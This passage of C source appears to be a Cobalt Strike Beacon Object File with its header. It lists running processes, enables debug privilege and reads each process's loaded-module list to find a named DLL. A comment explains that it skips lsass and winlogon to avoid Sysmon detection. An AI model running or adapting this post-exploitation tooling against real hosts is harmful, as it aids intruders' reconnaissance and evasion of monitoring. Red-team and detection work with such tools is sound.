	status = ZwAdjustPrivilegesToken(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
	if (status != STATUS_SUCCESS) {
		ZwClose(hToken);
		return FALSE;
	}

	ZwClose(hToken);

	return TRUE;
}

ULONG GetCurrentPid() {
	PROCESS_BASIC_INFORMATION pbi = { 0 };

	NTSTATUS status = ZwQueryInformationProcess(NtCurrentProcess(), ProcessBasicInformation, &pbi, sizeof(pbi), NULL);
	if (status != STATUS_SUCCESS) {
		return 0;
	}

	return (ULONG)pbi.UniqueProcessId;
}

LPWSTR WINAPI PathFindFileNameW(LPCWSTR lpszPath) {
	LPCWSTR lastSlash = lpszPath;

	while (lpszPath && *lpszPath)
	{
		if ((*lpszPath == '\\' || *lpszPath == '/' || *lpszPath == ':') &&
			lpszPath[1] && lpszPath[1] != '\\' && lpszPath[1] != '/')
			lastSlash = lpszPath + 1;
		lpszPath++;
	}
	return (LPWSTR)lastSlash;
}

BOOL EnumerateProcessModules(HANDLE hProcess, LPCWSTR lpwModuleName, PUNICODE_STRING uProcName, ULONG ulPid) {
	NTSTATUS status;
	BOOL bResult = FALSE;
	PROCESS_BASIC_INFORMATION BasicInformation;
	PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
	PPEB_LDR_DATA pLoaderData;
	LDR_DATA_TABLE_ENTRY LoaderModule;
	PLIST_ENTRY ListHead, Current;
	UNICODE_STRING uImagePathName;
	WCHAR wcImagePathName[MAX_PATH * 2];
	WCHAR wcFullDllName[MAX_PATH * 2];
	LPWSTR lpwDllName = NULL;

	status = ZwQueryInformationProcess(hProcess, ProcessBasicInformation, &BasicInformation, sizeof(BasicInformation), NULL);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}

	// Get the address of the Process Parameters struct and read ImagePathName data.
	status = ZwReadVirtualMemory(hProcess, &(BasicInformation.PebBaseAddress->ProcessParameters), &ProcessParameters, sizeof(ProcessParameters), NULL);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}

	status = ZwReadVirtualMemory(hProcess, &(ProcessParameters->ImagePathName), &uImagePathName, sizeof(uImagePathName), NULL);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}

	MSVCRT$memset(wcImagePathName, 0, sizeof(wcImagePathName));
	status = ZwReadVirtualMemory(hProcess, uImagePathName.Buffer, &wcImagePathName, uImagePathName.MaximumLength, NULL);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}

	// Get the address of the PE Loader data.
	status = ZwReadVirtualMemory(hProcess, &(BasicInformation.PebBaseAddress->Ldr), &pLoaderData, sizeof(pLoaderData), NULL);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}

	// Head of the module list: the last element in the list will point to this.
	ListHead = &pLoaderData->InLoadOrderModuleList;

	// Get the address of the first element in the list.
	status = ZwReadVirtualMemory(hProcess, &(pLoaderData->InLoadOrderModuleList.Flink), &Current, sizeof(Current), NULL);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}

	while (Current != ListHead) 
	{
		// Read the current module.
		status = ZwReadVirtualMemory(hProcess, CONTAINING_RECORD(Current, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks), &LoaderModule, sizeof(LoaderModule), NULL);
		if (status != STATUS_SUCCESS) {
			return FALSE;
		}

		MSVCRT$memset(wcFullDllName, 0, sizeof(wcFullDllName));
		status = ZwReadVirtualMemory(hProcess, (LPVOID)LoaderModule.FullDllName.Buffer, &wcFullDllName, LoaderModule.FullDllName.MaximumLength, NULL);
		if (status != STATUS_SUCCESS) {
			return FALSE;
		}

		lpwDllName = PathFindFileNameW(wcFullDllName);
		if (MSVCRT$_wcsicmp(lpwDllName, lpwModuleName) == 0) {
			BeaconPrintToStreamW(
				L"[+] ProcessName: %wZ\n"
				"    ProcessID:   %lu\n"
				"    ImagePath:   %ls\n"
				"    ModuleName:  %ls\n\n", uProcName, ulPid, wcImagePathName, wcFullDllName);
			
			bResult = TRUE;
		}

		// Address of the next module in the list.
		Current = LoaderModule.InLoadOrderLinks.Flink;
	}

	return bResult;
}

BOOL EnumerateProcessModulesFromWoW64(_In_ HANDLE hProcess, LPCWSTR lpwModuleName, PUNICODE_STRING uProcName, ULONG ulPid) {
	NTSTATUS status;
	BOOL bResult = FALSE;
	PROCESS_BASIC_INFORMATION_WOW64 BasicInformation64 = { 0 };
	PEB64 Peb64 = { 0 };
	RTL_USER_PROCESS_PARAMETERS64 ProcessParameters64 = { 0 };
	PEB_LDR_DATA64 LoaderData64 = { 0 };
	LDR_DATA_TABLE_ENTRY64 LoaderModule64 = { 0 };
	WCHAR wcImagePathName[MAX_PATH * 2];
	WCHAR wcFullDllName[MAX_PATH * 2];
	LPWSTR lpwDllName = NULL;

	_NtWow64QueryInformationProcess64 NtWow64QueryInformationProcess64 = (_NtWow64QueryInformationProcess64)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWow64QueryInformationProcess64");
	if (NtWow64QueryInformationProcess64 == NULL) {
		return FALSE;
	}

	_NtWow64ReadVirtualMemory64 NtWow64ReadVirtualMemory64 = (_NtWow64ReadVirtualMemory64)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWow64ReadVirtualMemory64");
	if (NtWow64ReadVirtualMemory64 == NULL) {
		return FALSE;
	}

	status = NtWow64QueryInformationProcess64(hProcess, ProcessBasicInformation, &BasicInformation64, sizeof(BasicInformation64), NULL);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}

	status = NtWow64ReadVirtualMemory64(hProcess, BasicInformation64.PebBaseAddress, &Peb64, sizeof(Peb64), NULL);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}

	// Get the address of the Process Parameters struct and read ImagePathName data.
	status = NtWow64ReadVirtualMemory64(hProcess, Peb64.ProcessParameters, &ProcessParameters64, sizeof(ProcessParameters64), NULL);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}

	MSVCRT$memset(wcImagePathName, 0, sizeof(wcImagePathName));
	status = NtWow64ReadVirtualMemory64(hProcess, ProcessParameters64.ImagePathName.Buffer, &wcImagePathName, ProcessParameters64.ImagePathName.MaximumLength, NULL);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}

	// Get the address of the PE Loader data.
	status = NtWow64ReadVirtualMemory64(hProcess, Peb64.Ldr, &LoaderData64, sizeof(LoaderData64), NULL);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}

	ULONG64 pStartModuleInfo = LoaderData64.InLoadOrderModuleList.Flink;
	ULONG64 pNextModuleInfo = LoaderData64.InLoadOrderModuleList.Flink;

	do
	{
		// Read the current module.
		status = NtWow64ReadVirtualMemory64(hProcess, pNextModuleInfo, &LoaderModule64, sizeof(LoaderModule64), NULL);
		if (status != STATUS_SUCCESS) {
			return FALSE;
		}

		MSVCRT$memset(wcFullDllName, 0, sizeof(wcFullDllName));
		status = NtWow64ReadVirtualMemory64(hProcess, LoaderModule64.FullDllName.Buffer, &wcFullDllName, LoaderModule64.FullDllName.MaximumLength, NULL);
		if (status != STATUS_SUCCESS) {
			return FALSE;
		}

		lpwDllName = PathFindFileNameW(wcFullDllName);
		if (MSVCRT$_wcsicmp(lpwDllName, lpwModuleName) == 0) {
			BeaconPrintToStreamW(
				L"[+] ProcessName: %wZ\n"
				"    ProcessID:   %lu\n"
				"    ImagePath:   %ls\n"
				"    ModuleName:  %ls\n\n", uProcName, ulPid, wcImagePathName, wcFullDllName);
			
			bResult = TRUE;
		}

		pNextModuleInfo = LoaderModule64.InLoadOrderLinks.Flink;

	} while (pNextModuleInfo != pStartModuleInfo);

	return bResult;
}


VOID go(IN PCHAR Args, IN ULONG Length) 
{
	NTSTATUS status;
	BOOL bResult = FALSE;
	BOOL bIsWoW64 = FALSE;
	PSYSTEM_PROCESSES pProcInfo = NULL;
	ULONG ulCurPid = 0;
	UNICODE_STRING uLsass;
	UNICODE_STRING uWinlogon;
	LPVOID pProcInfoBuffer = NULL;
	SIZE_T procInfoSize = 0x10000;
	ULONG uReturnLength = 0;
	LPCWSTR lpwModuleName = NULL;

	// Parse Arguments
	datap parser;
	BeaconDataParse(&parser, Args, Length);
	lpwModuleName = (LPWSTR)BeaconDataExtract(&parser, NULL);

	if (lpwModuleName == NULL) {
		BeaconPrintf(CALLBACK_ERROR, "Invalid argument...\n");
		return;
	}

	_RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitUnicodeString");
	if (RtlInitUnicodeString == NULL) {
		return;
	}

	_RtlEqualUnicodeString RtlEqualUnicodeString = (_RtlEqualUnicodeString)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlEqualUnicodeString");
	if (RtlEqualUnicodeString == NULL) {
		return;
	}

#if defined(WOW64)
	bIsWoW64 = IsProcessWoW64(NtCurrentProcess());
#endif

	if (IsElevated()) {
		SetDebugPrivilege();
	}

	do {
		pProcInfoBuffer = NULL;
		status = ZwAllocateVirtualMemory(NtCurrentProcess(), &pProcInfoBuffer, 0, &procInfoSize, MEM_COMMIT, PAGE_READWRITE);
		if (status != STATUS_SUCCESS) {
			return;
		}

		status = ZwQuerySystemInformation(SystemProcessInformation, pProcInfoBuffer, (ULONG)procInfoSize, &uReturnLength);
		if (status == STATUS_INFO_LENGTH_MISMATCH) {
			ZwFreeVirtualMemory(NtCurrentProcess(), &pProcInfoBuffer, &procInfoSize, MEM_RELEASE);
			procInfoSize += uReturnLength;
		}

	} while (status != STATUS_SUCCESS);

	ulCurPid = GetCurrentPid();
	RtlInitUnicodeString(&uLsass, L"lsass.exe");
	RtlInitUnicodeString(&uWinlogon, L"winlogon.exe");

	pProcInfo = (PSYSTEM_PROCESSES)pProcInfoBuffer;

	do {
		pProcInfo = (PSYSTEM_PROCESSES)(((LPBYTE)pProcInfo) + pProcInfo->NextEntryDelta);

		if ((ULONG)(ULONG_PTR)pProcInfo->ProcessId == 4) {
			continue;
		}

		if ((ULONG)(ULONG_PTR)pProcInfo->ProcessId == ulCurPid) {
			continue;
		}
		
		// Don't trigger sysmon by touching lsass or winlogon
		if (RtlEqualUnicodeString(&pProcInfo->ProcessName, &uLsass, TRUE)) {
			continue;
		}
		
		if (RtlEqualUnicodeString(&pProcInfo->ProcessName, &uWinlogon, TRUE)) {
			continue;
		}

		HANDLE hProcess = NULL;
		OBJECT_ATTRIBUTES ObjectAttributes;
		InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL);
		CLIENT_ID uPid = { 0 };

		uPid.UniqueProcess = pProcInfo->ProcessId;
		uPid.UniqueThread = (HANDLE)0;

		NTSTATUS status = ZwOpenProcess(&hProcess, PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, &ObjectAttributes, &uPid);
		if (hProcess != NULL) {
			if (bIsWoW64 && (!IsProcessWoW64(hProcess))) {
				if (EnumerateProcessModulesFromWoW64(hProcess, lpwModuleName, &pProcInfo->ProcessName, (ULONG)(ULONG_PTR)pProcInfo->ProcessId)) {
					bResult = TRUE;
				}
			}
			else{
				if (EnumerateProcessModules(hProcess, lpwModuleName, &pProcInfo->ProcessName, (ULONG)(ULONG_PTR)pProcInfo->ProcessId)) {
					bResult = TRUE;
				}
			}

			ZwClose(hProcess);
		}
		
		if (pProcInfo->NextEntryDelta == 0) {
			break;
		}

	} while (pProcInfo && pProcInfo->NextEntryDelta);

	if (bResult) {
		//Print final Output
		BeaconOutputStreamW();
	}
	else{
		BeaconPrintf(CALLBACK_OUTPUT,"[!] No matching modules found.");
	}

	if (pProcInfoBuffer) {
		status = ZwFreeVirtualMemory(NtCurrentProcess(), &pProcInfoBuffer, &procInfoSize, MEM_RELEASE);
	}

	return;
}


================================================
FILE: Process-BOF/findobjects/FindObjects.h
================================================
#pragma once

#include <windows.h>

#define STATUS_SUCCESS 0
#define STATUS_UNSUCCESSFUL 0xC0000001
#define STATUS_BUFFER_TOO_SMALL 0xC0000023
#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
typedef LONG KPRIORITY;

#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )

//KERNEL32
WINBASEAPI LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap();
WINBASEAPI BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID);

//MSVCRT
WINBASEAPI int __cdecl MSVCRT$_wcsicmp(const wchar_t *_Str1, const wchar_t *_Str2);
WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count);
WINBASEAPI size_t __cdecl MSVCRT$wcslen(const wchar_t *_Str);
WINBASEAPI int __cdecl MSVCRT$_vsnwprintf_s(wchar_t *buffer, size_t sizeOfBuffer, size_t count, const wchar_t *format, va_list argptr);
WINBASEAPI void *__cdecl MSVCRT$calloc(size_t number, size_t size);
WINBASEAPI void __cdecl MSVCRT$free(void *memblock);

//OLE32
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CreateStreamOnHGlobal(HGLOBAL hGlobal, BOOL fDeleteOnRelease, LPSTREAM *ppstm);

//ADVAPI32
WINADVAPI WINBOOL WINAPI ADVAPI32$LookupPrivilegeValueW(LPCWSTR lpSystemName, LPCWSTR lpName, PLUID lpLuid);

#define InitializeObjectAttributes( i, o, a, r, s ) {    \
      (i)->Length = sizeof( OBJECT_ATTRIBUTES );         \
      (i)->RootDirectory = r;                            \
      (i)->Attributes = a;                               \
      (i)->ObjectName = o;                               \
      (i)->SecurityDescriptor = s;                       \
      (i)->SecurityQualityOfService = NULL;              \
   }

typedef enum _SYSTEM_INFORMATION_CLASS {
	SystemBasicInformation,
	SystemProcessorInformation,
	SystemPerformanceInformation,
	SystemTimeOfDayInformation,
	SystemPathInformation,
	SystemProcessInformation,
	SystemCallCountInformation,
	SystemDeviceInformation,
	SystemProcessorPerformanceInformation,
	SystemFlagsInformation,
	SystemCallTimeInformation,
	SystemModuleInformation,
	SystemHandleInformation = 16,
	SystemProcessIdInformation = 88
} SYSTEM_INFORMATION_CLASS, * PSYSTEM_INFORMATION_CLASS;

typedef enum _OBJECT_INFORMATION_CLASS {
	ObjectBasicInformation = 0,
	ObjectNameInformation = 1,
	ObjectTypeInformation = 2,
	ObjectTypesInformation = 3,
	ObjectHandleFlagInformation = 4,
	ObjectSessionInformation = 5,
	ObjectSessionObjectInformation = 6,
	MaxObjectInfoClass = 7
} OBJECT_INFORMATION_CLASS;

// Partial PROCESSINFOCLASS
typedef enum _PROCESSINFOCLASS {
	ProcessBasicInformation, // q: PROCESS_BASIC_INFORMATION, PROCESS_EXTENDED_BASIC_INFORMATION
	ProcessQuotaLimits, // qs: QUOTA_LIMITS, QUOTA_LIMITS_EX
	ProcessIoCounters, // q: IO_COUNTERS
	ProcessVmCounters, // q: VM_COUNTERS, VM_COUNTERS_EX, VM_COUNTERS_EX2
	ProcessTimes, // q: KERNEL_USER_TIMES
	ProcessBasePriority, // s: KPRIORITY
	ProcessRaisePriority, // s: ULONG
	ProcessDebugPort, // q: HANDLE
	ProcessExceptionPort, // s: PROCESS_EXCEPTION_PORT
	ProcessAccessToken, // s: PROCESS_ACCESS_TOKEN
	ProcessLdtInformation, // qs: PROCESS_LDT_INFORMATION // 10
	ProcessLdtSize, // s: PROCESS_LDT_SIZE
	ProcessDefaultHardErrorMode, // qs: ULONG
	ProcessIoPortHandlers, // (kernel-mode only)
	ProcessPooledUsageAndLimits, // q: POOLED_USAGE_AND_LIMITS
	ProcessWorkingSetWatch, // q: PROCESS_WS_WATCH_INFORMATION[]; s: void
	ProcessUserModeIOPL,
	ProcessEnableAlignmentFaultFixup, // s: BOOLEAN
	ProcessPriorityClass, // qs: PROCESS_PRIORITY_CLASS
	ProcessWx86Information,
	ProcessHandleCount, // q: ULONG, PROCESS_HANDLE_INFORMATION // 20
	ProcessAffinityMask, // s: KAFFINITY
	ProcessPriorityBoost, // qs: ULONG
	ProcessDeviceMap, // qs: PROCESS_DEVICEMAP_INFORMATION, PROCESS_DEVICEMAP_INFORMATION_EX
	ProcessSessionInformation, // q: PROCESS_SESSION_INFORMATION
	ProcessForegroundInformation, // s: PROCESS_FOREGROUND_BACKGROUND
	ProcessWow64Information, // q: ULONG_PTR
	ProcessImageFileName // q: UNICODE_STRING
} PROCESSINFOCLASS;

typedef enum _POOL_TYPE {
	NonPagedPool = 0,
	NonPagedPoolExecute = 0,
	PagedPool = 1,
	NonPagedPoolMustSucceed = 2,
	DontUseThisType = 3,
	NonPagedPoolCacheAligned = 4,
	PagedPoolCacheAligned = 5,
	NonPagedPoolCacheAlignedMustS = 6,
} POOL_TYPE, * PPOOL_TYPE;

typedef struct _UNICODE_STRING {
	USHORT Length;
	USHORT MaximumLength;
	PWSTR  Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

typedef const UNICODE_STRING* PCUNICODE_STRING;

typedef struct _UNICODE_STRING_WOW64 {
	USHORT Length;
	USHORT MaximumLength;
	ULONG64 Buffer;
} UNICODE_STRING_WOW64;

typedef struct _SYSTEM_PROCESSES {
	ULONG NextEntryDelta;
	ULONG ThreadCount;
	ULONG Reserved1[6];
	LARGE_INTEGER CreateTime;
	LARGE_INTEGER UserTime;
	LARGE_INTEGER KernelTime;
	UNICODE_STRING ProcessName;
	KPRIORITY BasePriority;
	HANDLE ProcessId;
	HANDLE InheritedFromProcessId;
} SYSTEM_PROCESSES, * PSYSTEM_PROCESSES;

typedef struct _SYSTEM_PROCESS_ID_INFORMATION {
	HANDLE ProcessId;
	UNICODE_STRING ImageName;
} SYSTEM_PROCESS_ID_INFORMATION, * PSYSTEM_PROCESS_ID_INFORMATION;

typedef struct _OBJECT_ATTRIBUTES {
	ULONG Length;
	HANDLE RootDirectory;
	PUNICODE_STRING ObjectName;
	ULONG Attributes;
	PVOID SecurityDescriptor;
	PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

typedef struct _CLIENT_ID {
	HANDLE UniqueProcess;
	HANDLE UniqueThread;
} CLIENT_ID, * PCLIENT_ID;

typedef struct _SYSTEM_HANDLE {
	ULONG ProcessId;
	BYTE ObjectTypeNumber;
	BYTE Flags;
	USHORT Handle;
	PVOID Object;
	ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, * PSYSTEM_HANDLE;

typedef struct _SYSTEM_HANDLE_INFORMATION {
	ULONG HandleCount;
	SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;

typedef struct _OBJECT_TYPE_INFORMATION {
	UNICODE_STRING Name;
	ULONG TotalNumberOfObjects;
	ULONG TotalNumberOfHandles;
	ULONG TotalPagedPoolUsage;
	ULONG TotalNonPagedPoolUsage;
	ULONG TotalNamePoolUsage;
	ULONG TotalHandleTableUsage;
	ULONG HighWaterNumberOfObjects;
	ULONG HighWaterNumberOfHandles;
	ULONG HighWaterPagedPoolUsage;
	ULONG HighWaterNonPagedPoolUsage;
	ULONG HighWaterNamePoolUsage;
	ULONG HighWaterHandleTableUsage;
	ULONG InvalidAttributes;
	GENERIC_MAPPING GenericMapping;
	ULONG ValidAccess;
	BOOLEAN SecurityRequired;
	BOOLEAN MaintainHandleCount;
	USHORT MaintainTypeList;
	POOL_TYPE PoolType;
	ULONG PagedPoolUsage;
	ULONG NonPagedPoolUsage;
} OBJECT_TYPE_INFORMATION, * POBJECT_TYPE_INFORMATION;

typedef struct _PEB_LDR_DATA {
	ULONG Length;
	BOOLEAN Initialized;
	HANDLE SsHandle;
	LIST_ENTRY InLoadOrderModuleList;
	LIST_ENTRY InMemoryOrderModuleList;
	LIST_ENTRY InInitializationOrderModuleList;
	PVOID EntryInProgress;
	BOOLEAN ShutdownInProgress;
	HANDLE ShutdownThreadId;
} PEB_LDR_DATA, * PPEB_LDR_DATA;

typedef struct _PEB_LDR_DATA64 {
    ULONG Length;
    BOOLEAN Initialized;
    ULONG64 SsHandle;
    LIST_ENTRY64 InLoadOrderModuleList;
    LIST_ENTRY64 InMemoryOrderModuleList;
    LIST_ENTRY64 InInitializationOrderModuleList;
} PEB_LDR_DATA64, *PPEB_LDR_DATA64;

typedef struct _RTL_USER_PROCESS_PARAMETERS {
	BYTE           Reserved1[16];
	PVOID          Reserved2[10];
	UNICODE_STRING ImagePathName;
	UNICODE_STRING CommandLine;
} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;

typedef struct _LDR_DATA_TABLE_ENTRY64 {
	LIST_ENTRY64 InLoadOrderLinks;
	LIST_ENTRY64 InMemoryOrderLinks;
	union
	{
		LIST_ENTRY64 InInitializationOrderLinks;
		LIST_ENTRY64 InProgressLinks;
	};
	ULONG64 DllBase;
	ULONG64 EntryPoint;
	ULONG64 SizeOfImage;
	UNICODE_STRING_WOW64 FullDllName;
	UNICODE_STRING_WOW64 BaseDllName;
} LDR_DATA_TABLE_ENTRY64, *PLDR_DATA_TABLE_ENTRY64;

typedef struct _API_SET_NAMESPACE {
	ULONG Version;
	ULONG Size;
	ULONG Flags;
	ULONG Count;
	ULONG EntryOffset;
	ULONG HashOffset;
	ULONG HashFactor;
} API_SET_NAMESPACE, * PAPI_SET_NAMESPACE;

typedef struct _CURDIR64 {
	UNICODE_STRING_WOW64 DosPath;
	HANDLE Handle;
} CURDIR64, *PCURDIR64;

typedef struct _RTL_USER_PROCESS_PARAMETERS64 {
	ULONG MaximumLength;
	ULONG Length;
    ULONG Flags;
    ULONG DebugFlags;
    ULONG64 ConsoleHandle;
    ULONG ConsoleFlags;
    ULONG64 StandardInput;
    ULONG64 StandardOutput;
    ULONG64 StandardError;
    CURDIR64 CurrentDirectory;
    UNICODE_STRING_WOW64 DllPath;
    UNICODE_STRING_WOW64 ImagePathName;
    UNICODE_STRING_WOW64 CommandLine;
} RTL_USER_PROCESS_PARAMETERS64, *PRTL_USER_PROCESS_PARAMETERS64;

// Partial PEB64
typedef struct _PEB64 {
	BYTE Reserved[16];
	ULONG64 ImageBaseAddress;
	ULONG64 Ldr;
	ULONG64 ProcessParameters;
} PEB64, *PPEB64;

// Partial PEB
typedef struct _PEB {
	BOOLEAN InheritedAddressSpace;
	BOOLEAN ReadImageFileExecOptions;
	BOOLEAN BeingDebugged;
	union
	{
		BOOLEAN BitField;
		struct
		{
			BOOLEAN ImageUsesLargePages : 1;
			BOOLEAN IsProtectedProcess : 1;
			BOOLEAN IsLegacyProcess : 1;
			BOOLEAN IsImageDynamicallyRelocated : 1;
			BOOLEAN SkipPatchingUser32Forwarders : 1;
			BOOLEAN SpareBits : 3;
		};
	};
	HANDLE Mutant;

	PVOID ImageBaseAddress;
	PPEB_LDR_DATA Ldr;
	PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
	PVOID SubSystemData;
	PVOID ProcessHeap;
	PRTL_CRITICAL_SECTION FastPebLock;
	PVOID IFEOKey;
	PSLIST_HEADER AtlThunkSListPtr;
	union
	{
		ULONG CrossProcessFlags;
		struct
		{
			ULONG ProcessInJob : 1;
			ULONG ProcessInitializing : 1;
			ULONG ProcessUsingVEH : 1;
			ULONG ProcessUsingVCH : 1;
			ULONG ProcessUsingFTH : 1;
			ULONG ProcessPreviouslyThrottled : 1;
			ULONG ProcessCurrentlyThrottled : 1;
			ULONG ProcessImagesHotPatched : 1;
			ULONG ReservedBits0 : 24;
		};
	};
	union
	{
		PVOID KernelCallbackTable;
		PVOID UserSharedInfoPtr;
	};
	ULONG SystemReserved;
	ULONG AtlThunkSListPtr32;
	PAPI_SET_NAMESPACE ApiSetMap;
	ULONG TlsExpansionCounter;
	PVOID TlsBitmap;
	ULONG TlsBitmapBits[2];
	PVOID ReadOnlySharedMemoryBase;
	PVOID SharedData;
	PVOID* ReadOnlyStaticServerData;
	PVOID AnsiCodePageData;
	PVOID OemCodePageData;
	PVOID UnicodeCaseTableData;
	ULONG NumberOfProcessors;
	ULONG NtGlobalFlag;
	ULARGE_INTEGER CriticalSectionTimeout;
	SIZE_T HeapSegmentReserve;
	SIZE_T HeapSegmentCommit;
	SIZE_T HeapDeCommitTotalFreeThreshold;
	SIZE_T HeapDeCommitFreeBlockThreshold;
	ULONG NumberOfHeaps;
	ULONG MaximumNumberOfHeaps;
	PVOID* ProcessHeaps;
	PVOID GdiSharedHandleTable;
	PVOID ProcessStarterHelper;
	ULONG GdiDCAttributeList;
	PRTL_CRITICAL_SECTION LoaderLock;
	ULONG OSMajorVersion;
	ULONG OSMinorVersion;
	USHORT OSBuildNumber;
} PEB, * PPEB;

typedef struct _LDR_DATA_TABLE_ENTRY {
	LIST_ENTRY InLoadOrderLinks;
	LIST_ENTRY InMemoryOrderLinks;
	union
	{
		LIST_ENTRY InInitializationOrderLinks;
		LIST_ENTRY InProgressLinks;
	};
	PVOID DllBase;
	PVOID EntryPoint;
	ULONG SizeOfImage;
	UNICODE_STRING FullDllName;
	UNICODE_STRING BaseDllName;
	ULONG Flags;
	WORD LoadCount;
	WORD TlsIndex;
	union
	{
		LIST_ENTRY HashLinks;
		struct
		{
			PVOID SectionPointer;
			ULONG CheckSum;
		};
	};
	union
	{
		ULONG TimeDateStamp;
		PVOID LoadedImports;
	};
} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;

typedef struct _PROCESS_BASIC_INFORMATION {
	LONG ExitStatus;
	PPEB PebBaseAddress;
	ULONG_PTR AffinityMask;
	LONG BasePriority;
	ULONG_PTR UniqueProcessId;
	ULONG_PTR ParentProcessId;
} PROCESS_BASIC_INFORMATION, * PPROCESS_BASIC_INFORMATION;

typedef struct _PROCESS_BASIC_INFORMATION_WOW64 {
	NTSTATUS ExitStatus;
	ULONG64 PebBaseAddress;
	ULONG64 AffinityMask;
	KPRIORITY BasePriority;
	ULONG64 UniqueProcessId;
	ULONG64 InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION_WOW64, *PPROCESS_BASIC_INFORMATION_WOW64;

EXTERN_C NTSTATUS ZwQuerySystemInformation(
    SYSTEM_INFORMATION_CLASS SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
    );

EXTERN_C NTSTATUS ZwQueryInformationProcess(
	HANDLE ProcessHandle,
	DWORD ProcessInformationClass,
	PVOID ProcessInformation,
	DWORD ProcessInformationLength,
	PDWORD ReturnLength
	);

EXTERN_C NTSTATUS ZwOpenProcess(
    PHANDLE ProcessHandle, 
    ACCESS_MASK DesiredAccess, 
    POBJECT_ATTRIBUTES ObjectAttributes, 
    PCLIENT_ID ClientId
    );

EXTERN_C NTSTATUS ZwQueryInformationToken(
	HANDLE TokenHandle,
	TOKEN_INFORMATION_CLASS TokenInformationClass,
	PVOID TokenInformation,
	ULONG TokenInformationLength,
	PULONG ReturnLength
	);

EXTERN_C NTSTATUS ZwAdjustPrivilegesToken(
    IN HANDLE TokenHandle,
    IN BOOLEAN DisableAllPrivileges,
    IN PTOKEN_PRIVILEGES TokenPrivileges,
    IN ULONG PreviousPrivilegesLength,
    OUT PTOKEN_PRIVILEGES PreviousPrivileges OPTIONAL,
    OUT PULONG RequiredLength OPTIONAL
    );

EXTERN_C NTSTATUS ZwAllocateVirtualMemory(
    HANDLE ProcessHandle, 
    PVOID *BaseAddress, 
    ULONG_PTR ZeroBits, 
    PSIZE_T RegionSize, 
    ULONG AllocationType, 
    ULONG Protect
    );

EXTERN_C NTSTATUS ZwFreeVirtualMemory(
    HANDLE ProcessHandle, 
    PVOID *BaseAddress, 
    IN OUT PSIZE_T RegionSize, 
    ULONG FreeType
    );

EXTERN_C NTSTATUS ZwReadVirtualMemory(
    HANDLE hProcess, 
    PVOID lpBaseAddress, 
    PVOID lpBuffer, 
    SIZE_T NumberOfBytesToRead, 
    PSIZE_T NumberOfBytesRead
    );

EXTERN_C NTSTATUS ZwWriteVirtualMemory(
    HANDLE hProcess, 
    PVOID lpBaseAddress, 
    PVOID lpBuffer, 
    SIZE_T NumberOfBytesToWrite, 
    PSIZE_T NumberOfBytesWrite
    );

EXTERN_C NTSTATUS ZwDuplicateObject(
	HANDLE SourceProcessHandle,
	HANDLE SourceHandle,
	HANDLE TargetProcessHandle,
	PHANDLE TargetHandle,
	ACCESS_MASK DesiredAccess,
	ULONG Attributes,
	ULONG Options
	);

EXTERN_C NTSTATUS ZwQueryObject(
	HANDLE ObjectHandle,
	ULONG ObjectInformationClass,
	PVOID ObjectInformation,
	ULONG ObjectInformationLength,
	PULONG ReturnLength
	);

EXTERN_C NTSTATUS ZwClose(
    IN HANDLE KeyHandle
    );

typedef NTSTATUS(NTAPI* _NtOpenProcessToken)(
	IN HANDLE ProcessHandle,
	IN ACCESS_MASK DesiredAccess,
	OUT PHANDLE TokenHandle
	);

typedef PULONG(NTAPI *_RtlSubAuthoritySid)(
	PSID  Sid,
	ULONG SubAuthority
	);

typedef PUCHAR(NTAPI *_RtlSubAuthorityCountSid)(
	_In_ PSID Sid
	);

typedef void (WINAPI* _RtlInitUnicodeString)(
	PUNICODE_STRING DestinationString,
	PCWSTR SourceString
	);

typedef BOOLEAN(NTAPI* _RtlEqualUnicodeString)(
	PUNICODE_STRING String1,
	PCUNICODE_STRING String2,
	BOOLEAN CaseInSensitive
	);

typedef NTSTATUS(NTAPI *_NtWow64QueryInformationProcess64) (
	IN HANDLE ProcessHandle,
	IN PROCESSINFOCLASS ProcessInformationClass,
	OUT PVOID ProcessInformation,
	IN ULONG ProcessInformationLength,
	OUT PULONG ReturnLength OPTIONAL
	);

typedef NTSTATUS(NTAPI *_NtWow64ReadVirtualMemory64)(
	IN HANDLE ProcessHandle,
	IN ULONG64 BaseAddress,
	OUT PVOID Buffer,
	IN ULONG64 Size,
